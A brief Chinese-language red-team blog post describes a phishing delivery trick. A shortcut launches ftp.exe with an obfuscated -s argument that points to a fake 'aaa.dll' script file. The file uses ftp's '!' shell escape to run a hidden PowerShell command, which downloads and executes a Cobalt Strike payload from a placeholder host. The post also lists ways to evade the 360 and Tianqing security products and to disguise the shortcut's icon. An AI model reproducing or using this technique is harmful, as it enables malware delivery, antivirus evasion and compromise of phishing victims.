沙箱检测补充-利用社会工程学

一键Dump lsass+logonpassowrd

利用方法来自于去年红队会议中红雨滴分析的一个样本文件，当时只是记录了下，后来就一直没时间看，今天看To do的时候发现这个记录，就想办法把这个利用落地。

以前的抓鸡教程中经常会有用-s参数执行多条上传保存命令。

而ftp参数!可以执行系统命令。两个结合下就可以达到命令执行的效果。

ftp> ! 从ftp子系统退出到外壳

创建一个快捷方式(参数混淆绕过360)

C:\Windows\System32\ftp.exe -""s:aaa.dll

新建一个txt 文件名aaa.dll，内容是cs的powershell上线命令。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).dow"nloa"dstring('http://xxxxxxx:802/a1111'))"

但是现在第三方调用powershell这种方法已经被360拦截。

看了下特征可以绕过天擎。

1、ftp执行参数混淆

2、第三方调用powershell不触发参数行为

3、点击最小化。

图标问题可以查看我上次写的文章制作ICO，使用网络图片。

不过这种执行在任务栏会驻留。

但是不用担心，ftp进程被关闭后，powershell还是会独立运行，他的父进程不是ftp

未知黑客团队钓鱼样本分析